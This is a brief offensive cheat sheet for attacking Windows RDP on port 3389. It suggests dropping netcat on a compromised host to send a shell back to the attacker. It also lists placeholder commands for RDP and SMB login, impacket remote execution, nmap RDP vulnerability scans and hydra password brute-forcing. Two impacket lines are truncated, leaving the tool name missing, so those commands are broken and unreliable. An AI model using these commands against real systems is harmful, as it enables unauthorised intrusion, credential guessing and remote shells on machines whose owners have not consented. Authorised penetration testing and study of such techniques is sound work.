3389 - RDP
If you get RDP access, first transfer nc.exe (Windows) or netcat (Linux) to the target to get a shell back on the attacking machine.
Handy commands:
Xfreerdp: xfreerdp /v:<IP> /u:<USER> /d:<DOMAIN> /p:<PASS> +clipboard /dynamic-resolution /drive:/opt,share
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <pass> <IP>
psexec: impacket-
<user>:<pass>@<IP>
smbclient: smbclient \\\\<IP>\\ -U <user>
Nmap: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
Bruteforce: hydra -L <users.txt> -P <pass.txt> <IP> rdp
smbmap: smbmap -d <domain> -u <user> -p <pass> -H <IP>
wmiexec: impacket-
<domain>/<user>:<pass>@<IP>